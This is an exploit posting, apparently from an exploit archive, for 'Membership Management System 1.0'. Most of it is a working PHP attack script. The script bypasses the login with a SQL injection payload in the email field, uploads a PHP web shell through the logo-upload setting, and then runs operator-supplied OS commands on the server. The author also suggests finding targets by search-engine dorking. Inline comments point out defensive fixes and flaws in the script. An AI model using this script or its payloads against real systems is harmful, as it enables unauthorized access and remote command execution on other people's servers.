## https://sploitus.com/exploit?id=PACKETSTORM:181551
=============================================================================================================================================
| # Title : Membership Management System version 1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://codeastro.com/membership-management-system-in-php-with-source-code/ |
=============================================================================================================================================
poc :
[+] Dorking in Google or another search engine.
[+] This payload injects PHP code that contains a back door.
[+] Line 20: set your target (the `$urlBase` value).
[+] save payload as poc.php
[+] usage from cmd : C:\www\test>php 1.php
[+] payload :
<?php
// Function to generate a random string of a given length
function randomGen($size = 8, $chars = 'abcdefghijklmnopqrstuvwxyz') {
    // Build a pool at least $size characters long by repeating the alphabet,
    // shuffle it (str_shuffle is not a CSPRNG), then cut out the result.
    // The slice deliberately starts at offset 1, not 0, so when $size is an
    // exact multiple of strlen($chars) the result is one character short.
    $repeatCount = ceil($size / strlen($chars));
    $shuffledPool = str_shuffle(str_repeat($chars, $repeatCount));
    return substr($shuffledPool, 1, $size);
}
// PoC flow, as written below: (1) POST the login form with an injected value in the
// email field and harvest the first Set-Cookie value; (2) reuse that cookie to POST a
// multipart settings update whose "logo" part is a PHP file; (3) GET the uploaded file
// with a `cmd` query parameter. From a defender's view each stage is observable in the
// web server / application logs, and stages (1) and (2) correspond to the two fixes the
// application needs (parameterised login query; upload type/extension validation and
// storage outside the web root).
//
// Name of the file that will be uploaded; random so it is unlikely to collide on the target.
$shellFile = randomGen() . ".php";
// Login form fields. Only the email value carries the injection: a closing quote,
// an always-true condition, and a `#` that comments out the rest of the SQL statement.
$payload = [
'email' => "test@mail.com' or 0=0 #", // Adjust based on the target; quote/comment token sequence is what a login-audit or WAF rule can flag
'password' => 'a',
'login' => ''
];
$session = curl_init();
// Target base URL (change this to your target IP or domain). All requests below derive from it.
$urlBase = "http://127.0.0.1/Membership/";
// Stage 1: login request
$url = $urlBase . "index.php";
echo "=== Executing SQL Injection ===\n";
// POST the form URL-encoded; the same cURL handle is reused for the upload later,
// so options set here (HEADER, RETURNTRANSFER, VERBOSE) still apply to that request.
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_POST, 1);
curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($session, CURLOPT_RETURNTRANSFER, true);
curl_setopt($session, CURLOPT_HEADER, true); // Response headers are returned in $response so Set-Cookie can be read
curl_setopt($session, CURLOPT_FOLLOWLOCATION, false); // A redirect after login is not followed; the cookie is read from the first response
curl_setopt($session, CURLOPT_VERBOSE, true); // For debugging
// Execute the login request. NOTE(review): curl_exec() returns false on transport
// failure and nothing below checks for that; substr() would then operate on an empty string.
$response = curl_exec($session);
// Split the raw response into headers and body using cURL's reported header length.
$header_size = curl_getinfo($session, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
$body = substr($response, $header_size);
// Capture the name=value part (up to the first ';') of every Set-Cookie header;
// only the first match is used, so the script assumes the session cookie is issued first.
preg_match_all('/^Set-Cookie:\s*([^;]+)/mi', $headers, $matches);
$cookie = '';
if (isset($matches[1][0])) {
$cookie = $matches[1][0];
}
// Print headers for debugging
echo "=== Response Headers ===\n";
echo $headers;
// Truthiness check: a (theoretical) cookie value of "0" would be treated as missing.
// Note that the presence of a Set-Cookie header alone does not prove the login succeeded;
// the body is captured above but never inspected.
if ($cookie) {
echo "=== Authenticated admin cookie: " . $cookie . " ===\n";
} else {
echo "Set-Cookie header not found in the response.\n";
exit();
}
// Stage 2: settings update used as the upload vector
$url = $urlBase . "settings.php";
// The OS command to run is read interactively from STDIN (no validation; it is URL-encoded below).
echo "Enter the command to execute: ";
$cmd_input = trim(fgets(STDIN));
// Contents of the uploaded file: a one-line PHP script that passes the `cmd` request
// parameter to system(). Server-side, rejecting non-image uploads by extension and
// content, and storing uploads outside the document root, removes the execution path.
$php_code = "<?php if(isset(\$_REQUEST['cmd'])){\$cmd = \$_REQUEST['cmd']; system(\$cmd); die; }?>";
// Hand-built multipart/form-data body (cURL could build this itself, but the manual
// form lets the filename and Content-Type of the "logo" part be set explicitly).
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
$body = "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="systemName"' . "\r\n\r\n";
$body .= "Membership System\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="currency"' . "\r\n\r\n";
$body .= "$\r\n";
$body .= "--$boundary\r\n";
// The file part keeps the client-supplied ".php" filename; this is the field an upload filter must validate.
$body .= 'Content-Disposition: form-data; name="logo"; filename="' . $shellFile . '"' . "\r\n";
$body .= 'Content-Type: application/x-php' . "\r\n\r\n";
$body .= $php_code . "\r\n";
$body .= "--$boundary\r\n";
$body .= 'Content-Disposition: form-data; name="updateSettings"' . "\r\n\r\n";
$body .= "\r\n";
$body .= "--$boundary--\r\n";
// Reuse the handle from stage 1; override URL, body, and add the boundary and session cookie headers.
curl_setopt($session, CURLOPT_URL, $url);
curl_setopt($session, CURLOPT_POST, 1);
curl_setopt($session, CURLOPT_POSTFIELDS, $body);
curl_setopt($session, CURLOPT_HTTPHEADER, [
'Content-Type: multipart/form-data; boundary=' . $boundary,
'Cookie: ' . $cookie
]);
echo "=== Logging in and uploading shell " . $shellFile . " ===\n";
// Execute the upload request. The response is stored but never inspected, so an
// upload rejected by the application is not detected here; stage 3 simply fails.
$response = curl_exec($session);
// Close cURL session
curl_close($session);
// Stage 3: request the uploaded file. Assumes the application stores the logo under
// "uploads/" with the client-supplied filename — not verified by this script.
$requestUrl = $urlBase . "uploads/" . $shellFile . "?cmd=" . urlencode($cmd_input);
echo "=== Issuing the command: " . $requestUrl . " ===\n";
echo "=== CURL OUTPUT ===\n";
// file_get_contents() is used for the final GET (no cookie needed); returns false on failure, which echoes as an empty string.
echo file_get_contents($requestUrl);
?>
[+]
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================